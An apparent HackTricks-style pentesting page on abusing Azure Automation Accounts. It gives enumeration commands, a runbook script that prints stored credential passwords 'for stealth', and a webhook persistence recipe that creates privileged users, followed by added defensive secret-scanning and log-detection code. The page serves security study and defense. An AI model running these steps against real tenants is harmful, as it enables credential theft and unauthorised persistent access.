Az - Automation Account

Basic Information

From the docs: Azure Automation delivers a cloud-based automation, operating system update, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.

These are like "scheduled tasks" in Azure that let you execute things (actions or even scripts) to manage, check and configure Azure environments.

Run As Account

When a Run as Account is used, it creates an Azure AD application with a self-signed certificate, creates a service principal and assigns the Contributor role to the account in the current subscription (a lot of privileges). Microsoft recommends using a Managed Identity for the Automation Account.

This was retired on 30 September 2023 and replaced by Managed Identities.

Runbooks & Jobs

Runbooks allow you to execute arbitrary PowerShell code. This can be abused by an attacker to steal the permissions of the attached principal (if any). Runbook code can also contain sensitive information (such as creds).

If you can read the jobs, do it, as they contain the output of the run (potentially sensitive information).

Go to Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

A Runbook can be run in a container inside Azure or in a Hybrid Worker (a non-Azure machine). The Log Analytics Agent is deployed on the VM to register it as a hybrid worker. Hybrid worker jobs run as SYSTEM on Windows and as the nxautomation account on Linux. Each Hybrid Worker is registered in a Hybrid Worker Group.

Therefore, if you can choose to run a Runbook on a Windows Hybrid Worker, you will be able to execute arbitrary commands inside an external machine as SYSTEM (a nice pivoting technique).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources, and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.

Sensitive information can be found in these configurations.

RCE

It's possible to abuse SC to execute arbitrary scripts in the managed machines.

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Create a Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Get Creds & Variables defined in the Automation Account using a Runbook

# Change the credentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -Name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | Out-File -Encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' # Change this for stealth

# Create Runbook, publish, start, and get output
New-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunbook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
Start-Sleep 20
# Job output objects carry the printed values in their Summary property
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summary

You can do the same thing by modifying an existing Runbook, and from the web console.
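The three places this page says secrets end up (runbook code, DSC configuration data, and job output when a runbook unwraps a credential the way the script above does) can be checked offline once runbooks and DSC configs have been exported with the cmdlets above. The following scanner is an added example, not HackTricks' or Microsoft's code; the sample runbook and DSC text are constructed, and the patterns are assumptions about which PowerShell constructs deserve review.

```python
import re

# Constructed sample exports (not real runbooks): a runbook with embedded secrets that also
# echoes an Automation credential into the job output, and a DSC configuration data block.
SAMPLE_RUNBOOK = """
$pw = ConvertTo-SecureString "Sup3rSecret!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("svc-backup", $pw)
$cs = "Server=sql1;User Id=app;Password=hunter2;"
$safe = Get-AutomationPSCredential -Name "BackupCred"
Write-Output $safe.GetNetworkCredential().Password
"""
SAMPLE_DSC = """
$ConfigData = @{ AllNodes = @(@{ NodeName = "*"; PsDscAllowPlainTextPassword = $true }) }
"""

# (label, pattern) pairs for constructs that put secrets in runbook code, DSC data or job output
PATTERNS = [
    ("SecureString built from a plaintext literal",
     re.compile(r'ConvertTo-SecureString\s+["\'][^"\']+["\'].*-AsPlainText', re.I)),
    ("password value in assignment or connection string",
     re.compile(r'(?<![a-z])(?:password|pwd)\s*=\s*["\']?[^"\';\s]+', re.I)),
    ("DSC configuration data allows plaintext passwords in the MOF",
     re.compile(r'PsDscAllowPlainTextPassword\s*=\s*\$true', re.I)),
    ("Automation credential unwrapped to plaintext (leaks into job output)",
     re.compile(r'\.GetNetworkCredential\(\)\.password', re.I)),
]

def redact(line):
    """Mask quoted strings and password=value pairs so findings can be logged without the secret."""
    line = re.sub(r'(["\'])[^"\']*\1', r'\1***\1', line)
    return re.sub(r'(?i)((?<![a-z])(?:password|pwd)\s*=\s*)[^"\';\s]+', r'\1***', line)

def scan(text, source):
    """Return one (source, line_no, label, redacted_line) tuple per matching pattern per line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for label, rx in PATTERNS:
            if rx.search(line):
                findings.append((source, no, label, redact(line)))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_RUNBOOK, "runbook.ps1") + scan(SAMPLE_DSC, "config.ps1"):
        print("%s:%d  %s\n    %s" % f)
```

Run it over the folder produced by Export-AzAutomationRunbook / Export-AzAutomationDscConfiguration; every hit is a secret that anyone with read access to the Automation Account (or its job history) already has.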

Steps to Set Up an Automated Privileged User Creation Process

1. Initialize an Automation Account

  • Required Action: Create a new Automation Account.

  • Specific Setting: Ensure "Create Azure Run As account" is enabled.

2. Import and Set Up a Runbook

  • Source: Download the sample runbook from the MicroBurst GitHub Repository.

  • Required Actions:

    • Import the runbook into the Automation Account.

    • Publish the runbook so it can be executed.

    • Attach a webhook to the runbook, enabling external triggers.

3. Configure the AzureAD Module

  • Required Action: Add the AzureAD module to the Automation Account.

  • Additional Step: Ensure all Azure Automation modules are updated to their latest versions.

4. Permission Assignment

  • Roles to Assign:

    • User Administrator

    • Subscription Owner

  • Goal: Assign these roles to the Automation Account to grant the required permissions.

5. Awareness of Potential Access Loss

  • Note: Be aware that setting up automation like this can lead to losing control over the subscription.

6. Trigger User Creation

  • Trigger the webhook to create a new user by sending a POST request.

  • Use the PowerShell script provided below, making sure to replace $uri with your actual webhook URL and to update $AccountInfo with the desired username and password.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
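Both the runbook-execution chain shown earlier (create or edit a runbook, publish it, start a job) and the persistence setup above (attach a webhook so the runbook can be fired from outside Azure) leave Azure Activity Log entries under the Microsoft.Automation provider, so they can be correlated per caller and per Automation Account. The detection below is an added example, not HackTricks' or Microsoft's code; the log records are constructed with only the fields the logic reads, and the 30-minute window is an assumed tuning value.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Azure Activity Log entries, reduced to the fields used here
# (real entries carry many more). Operation names are Microsoft.Automation RBAC operations.
ACCT = "/subscriptions/<SUB-ID>/resourceGroups/rg1/providers/Microsoft.Automation/automationAccounts/acct1"
def rec(time, caller, op, suffix):
    return {"time": time, "caller": caller, "operationName": op, "resourceId": ACCT + suffix}
SAMPLE_RECORDS = [
    rec("2024-01-10T10:00:00", "dev@contoso.example", "Microsoft.Automation/automationAccounts/runbooks/write", "/runbooks/Exif-Credentials"),
    rec("2024-01-10T10:01:00", "dev@contoso.example", "Microsoft.Automation/automationAccounts/runbooks/publish/action", "/runbooks/Exif-Credentials"),
    rec("2024-01-10T10:02:00", "dev@contoso.example", "Microsoft.Automation/automationAccounts/jobs/write", "/jobs/1111"),
    rec("2024-01-10T10:05:00", "dev@contoso.example", "Microsoft.Automation/automationAccounts/webhooks/write", "/webhooks/wh1"),
    rec("2024-01-10T11:00:00", "scheduler-identity", "Microsoft.Automation/automationAccounts/jobs/write", "/jobs/2222"),
]

# Ordered steps of the chain; step 0 accepts a new runbook or an edited draft of an existing one
RUNBOOK_CHAIN = (
    {"Microsoft.Automation/automationAccounts/runbooks/write",
     "Microsoft.Automation/automationAccounts/runbooks/draft/write"},
    {"Microsoft.Automation/automationAccounts/runbooks/publish/action"},
    {"Microsoft.Automation/automationAccounts/jobs/write"},
)
CHAIN_OPS = set().union(*RUNBOOK_CHAIN)
# Operations that warrant an alert on their own: a webhook lets the runbook be fired from outside Azure
STANDALONE_OPS = {"Microsoft.Automation/automationAccounts/webhooks/write": "webhook attached to runbook"}

def account_scope(resource_id):
    """Trim a resource id to its .../automationAccounts/<name> prefix so runbooks, jobs and webhooks group together."""
    parts = resource_id.split("/")
    lower = [p.lower() for p in parts]
    if "automationaccounts" in lower:
        return "/".join(parts[: lower.index("automationaccounts") + 2])
    return resource_id

def detect(records, window=timedelta(minutes=30)):
    """Return (caller, account, reason) alerts: a caller completing create/edit -> publish -> start
    on one account within `window`, plus any standalone persistence operation."""
    alerts, chains = [], defaultdict(list)
    for r in sorted(records, key=lambda r: r["time"]):
        op, scope = r["operationName"], account_scope(r["resourceId"])
        if op in STANDALONE_OPS:
            alerts.append((r["caller"], scope, STANDALONE_OPS[op]))
        elif op in CHAIN_OPS:
            chains[(r["caller"], scope)].append((op, datetime.fromisoformat(r["time"])))
    for (caller, scope), events in chains.items():
        step, first = 0, None
        for op, t in events:  # time-ordered; each step must be the next one and within window of the first
            if op in RUNBOOK_CHAIN[step] and (first is None or t - first <= window):
                first, step = first or t, step + 1
                if step == len(RUNBOOK_CHAIN):
                    alerts.append((caller, scope, "runbook created/edited, published and started"))
                    break
    return alerts
```

A scheduled identity that only ever emits jobs/write never completes the chain, which keeps routine job starts out of the alert list; pair the webhook alert with a review of role assignments on the account's identity, since that is the second half of the persistence recipe.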
